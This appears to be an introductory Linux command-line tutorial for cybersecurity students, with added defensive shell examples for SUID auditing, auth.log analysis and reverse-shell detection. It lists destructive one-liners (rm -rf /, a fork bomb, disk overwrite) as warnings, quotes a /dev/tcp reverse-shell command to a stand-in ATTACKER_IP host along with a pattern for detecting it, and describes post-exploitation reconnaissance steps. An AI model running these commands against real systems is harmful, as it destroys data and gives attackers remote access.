The command line is the hacker's best friend. Master essential Linux commands — ls, cd, cat, mkdir, and more — in this hands-on simulated terminal.
In cybersecurity, the command-line interface (CLI) is your primary workspace. While graphical interfaces look pretty, they limit what you can do. The terminal gives you speed, precision, scripting ability, and access to tools that have no GUI. Whether you're pentesting, analyzing logs, hardening servers, or automating tasks — the terminal is where the real work happens.
Think about it: most servers (especially Linux) don't even have a desktop
environment installed. When you SSH into a remote server, you get a terminal — that's it. Every
cybersecurity tool you'll use professionally (Nmap, Burp Suite's CLI, Metasploit, Wireshark's tshark) works from the command line.
The most common shell on Linux is Bash (Bourne
Again SHell), though you'll also encounter zsh, fish, and sh. On most modern
systems, the default is Bash or Zsh.
cd) or an external program (/usr/bin/ls).
ls /home, /home is the argument.
ls -la, -l (long format) and -a (show hidden) are flags.
Every Linux command follows this general structure:
ls
-la (-l = long, -a = all)
/home/user
Tip: Short flags use a single dash (-l), long flags use double dashes (--long-format). Short flags can be combined: -la = -l -a.
These are the commands you'll use every single day. Master them, and you'll navigate any Linux system with confidence:
pwd (Print Working Directory)
Shows the full path of your current location. Always use this
when you're lost. Output: /home/user/documents
ls (List)
Lists files and directories. Add -l for details (permissions, size, date), -a for hidden files (starting with .), -h for human-readable sizes.
cd <dir> (Change Directory)
cd /etc — go to /etc. cd .. — go up one level. cd ~ — go
home. cd - — go to previous directory.
cat <file> (Concatenate)
Displays the entire contents of a file. For large files, use
less (scrollable) or head -n 20
(first 20 lines).
mkdir <name> (Make Directory)
Creates a new directory. Use -p to create nested directories: mkdir -p project/src/utils
touch <file>
Creates an empty file. If the file exists, it updates the modification timestamp. Often used to create placeholder files.
echo <text>
Prints text to the terminal. Combined with redirection: echo "hello" > file.txt writes to a file.
whoami
Shows the current username. Critical in security: knowing if
you're root or a regular user determines what you
can do.
id
Shows user ID (uid), group ID (gid), and all groups. uid=0 means root!
man <cmd> (Manual)
Opens the manual page for any command. Press q to quit. Example: man ls shows all
ls options.
grep <pattern> <file>
Searches for text patterns in files. grep -i "error" /var/log/syslog — case-insensitive search for
"error" in syslog.
find <path> -name <pattern>
Searches for files. find / -name "*.conf" -type f — find all .conf files on the system.
Everything in Linux is a file — even hardware devices, network interfaces, and
running processes. The filesystem is organized in a tree structure starting from the root (/). Here are the most important directories:
/ (Root)
The top-level directory. Everything exists under /. Don't confuse with /root (root user's home).
/home
User home directories. Each user gets /home/username. Your personal files, configs, and SSH keys
live here.
/etc
System configuration files. Passwords (/etc/passwd, /etc/shadow), network config, service configs all live
here.
/var/log
System and application log files. syslog, auth.log
(login attempts), apache2/ — goldmine for forensics.
/bin & /usr/bin
Essential command binaries (ls, cat, grep, etc.). On modern systems, /bin is often a symlink to /usr/bin.
/tmp
Temporary files. World-writable — any user can read/write here. Attackers often store payloads and scripts here.
/root
The root (superuser) home directory. Not the same as /. Only accessible by root.
/dev
Device files. Hard drives (/dev/sda), null device (/dev/null), random (/dev/urandom).
During a penetration test, the first thing you do after gaining shell
access is run whoami, id, and uname -a to understand your privileges and the system. Then
you explore: cat /etc/passwd (user accounts), ls -la /tmp (look for dropped tools), cat /var/log/auth.log (see login attempts). Knowing these
commands instinctively is what separates a beginner from a professional.
Most commands accept flags that modify their behavior. Learning common flags will make you 10x more efficient:
grep (Global Regular Expression
Print) searches for text patterns inside files. It's one of the most-used tools in log analysis,
forensics, and CTF challenges.
find searches for files and
directories based on name, type, size, permissions, and more. Essential for security auditing.
⚠️ Security: find / -perm -4000 is one of the first commands run during Linux
privilege escalation — it finds binaries with the SUID bit that could be exploited to gain root
access.
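The same find test works as a defensive audit: list every SUID file and report the ones that are missing from an approved baseline. This is an added example, not part of the original page; the function names, the throwaway fixture tree and the baseline file are assumptions constructed for the demo.

```bash
#!/bin/sh
# Added example: SUID baseline audit. Every path below is a constructed fixture.
export LC_ALL=C   # sort and comm must agree on ordering

# suid_files DIR: regular files under DIR with the SUID bit set, sorted
suid_files() { find "$1" -xdev -type f -perm -4000 2>/dev/null | sort; }

# unexpected_suid DIR BASELINE: SUID files under DIR that are not listed
# in BASELINE (one absolute path per line, sorted)
unexpected_suid() { suid_files "$1" | comm -23 - "$2"; }

# Build a throwaway tree so the audit can be tried without touching the system
make_fixture() {
    fx=$(mktemp -d)
    mkdir -p "$fx/usr/bin" "$fx/tmp"
    : > "$fx/usr/bin/passwd"; chmod 4755 "$fx/usr/bin/passwd"   # approved SUID
    : > "$fx/usr/bin/ls";     chmod 0755 "$fx/usr/bin/ls"       # no SUID bit
    : > "$fx/tmp/.helper";    chmod 4755 "$fx/tmp/.helper"      # SUID nobody approved
    printf '%s\n' "$fx/usr/bin/passwd" > "$fx/baseline.txt"
    echo "$fx"
}

fx=$(make_fixture)
unexpected_suid "$fx" "$fx/baseline.txt"   # prints only the tmp/.helper path
rm -rf "$fx"
```

On a real host, record the baseline once from a known-good state and run the comparison on a schedule; any new line is worth investigating.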
The real power of the Linux CLI comes from piping (|) —
chaining commands together so the output of one becomes the input of the next. This lets you build
complex data processing pipelines from simple commands.
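A pipeline of the kind described above, applied to auth.log-style entries to rank the sources of failed SSH logins. This is an added example, not part of the original page; the log lines are constructed (documentation IP ranges, invented hostnames and users) and the function names are assumptions.

```bash
#!/bin/sh
# Constructed sample in the style of OpenSSH entries in /var/log/auth.log
sample_auth_log() {
cat <<'EOF'
Mar  3 10:01:12 web01 sshd[2101]: Failed password for root from 203.0.113.7 port 51122 ssh2
Mar  3 10:01:15 web01 sshd[2101]: Failed password for root from 203.0.113.7 port 51122 ssh2
Mar  3 10:01:19 web01 sshd[2104]: Failed password for invalid user admin from 203.0.113.7 port 51130 ssh2
Mar  3 10:02:40 web01 sshd[2110]: Accepted password for alice from 198.51.100.23 port 40022 ssh2
Mar  3 10:03:02 web01 sshd[2115]: Failed password for invalid user test from 192.0.2.55 port 38811 ssh2
Mar  3 10:05:47 web01 sshd[2120]: Failed password for alice from 198.51.100.23 port 40100 ssh2
Mar  3 10:06:01 web01 sshd[2122]: Failed password for invalid user oracle from 192.0.2.55 port 38900 ssh2
EOF
}

# failed_by_ip: log on stdin -> "count ip" lines, highest count first
failed_by_ip() {
    grep 'Failed password' |
    sed -n 's/.* from \([0-9.]*\) port .*/\1/p' |
    sort | uniq -c | sort -rn |
    awk '{print $1, $2}'
}

# sources_over N: only the IPs with at least N failed attempts
sources_over() {
    failed_by_ip | awk -v t="$1" '$1 >= t {print $2}'
}

# targeted_users: log on stdin -> "count user" for the account names tried
targeted_users() {
    grep 'Failed password' |
    sed -n 's/.*Failed password for \(invalid user \)\{0,1\}\([^ ]*\) from .*/\2/p' |
    sort | uniq -c | sort -rn |
    awk '{print $1, $2}'
}

sample_auth_log | failed_by_ip
```

Each stage does one job: grep selects the lines, sed extracts a field, sort and uniq -c count it, and the final sort ranks the result. To run it on a real system, feed the functions the actual file, for example failed_by_ip < /var/log/auth.log.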
Environment variables are key-value pairs that configure the shell and programs.
They control everything from which programs you can run (PATH) to your home directory (HOME).
printenv and /proc/[pid]/environ can
expose them. Use proper secret management (Vault, AWS Secrets Manager).
~/.bash_history stores
every command you've typed — including any passwords accidentally entered in plaintext
(e.g., mysql -u root -p'secret123'). On shared systems,
always run history -c and clear the history file. Prefix
commands with a space ( mysql ...) to prevent them from being
recorded (requires HISTCONTROL=ignorespace).
rm -rf / — Deletes the entire filesystem (modern systems block this without --no-preserve-root).
:(){ :|:& };: — A fork bomb that creates processes recursively until the system runs out of memory and crashes.
dd if=/dev/zero of=/dev/sda — Overwrites the entire disk with zeros.
Always verify commands before running, especially with sudo.
Attackers frequently use one-liners like bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 to establish a
reverse shell — a connection from the victim's machine back to the attacker. If you find
this in /tmp, cron, or running
processes, the system is compromised.
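A check for that indicator, as an added example that is not part of the original page: it searches files (and, through a second function, any text stream such as a process listing) for redirections to /dev/tcp. The function names and the fixture files are constructed for the demo; the one-liner from the text is stored only as inert text.

```bash
#!/bin/sh
# Added example: hunt for /dev/tcp reverse-shell one-liners. Fixtures are constructed.

# Matches a redirection to bash's /dev/tcp/HOST/PORT (or /dev/udp) pseudo-device
REVSHELL_RE='/dev/(tcp|udp)/[^/[:space:]]+/[0-9]+'

# scan_files PATH...: print file:line:text for every matching line under PATH
scan_files() { grep -rnE "$REVSHELL_RE" "$@" 2>/dev/null; }

# scan_stream: same check for text on stdin, e.g. ps -eo pid,args | scan_stream
scan_stream() { grep -E "$REVSHELL_RE"; }

# Build a throwaway tree that stands in for /tmp and a cron directory
make_fixture() {
    fx=$(mktemp -d)
    mkdir -p "$fx/tmp" "$fx/cron.d"
    # Benign cron entry
    echo '0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf' > "$fx/cron.d/logrotate"
    # The one-liner quoted in the text, written as data and never executed
    cat > "$fx/cron.d/sysupdate" <<'EOF'
* * * * * root bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
EOF
    echo 'echo cleanup done' > "$fx/tmp/cleanup.sh"
    echo "$fx"
}

fx=$(make_fixture)
scan_files "$fx/tmp" "$fx/cron.d"   # reports cron.d/sysupdate, line 1
rm -rf "$fx"
```

A hit is a strong indicator, but an empty result proves nothing: the string is easy to encode or split, so treat this as one check among several.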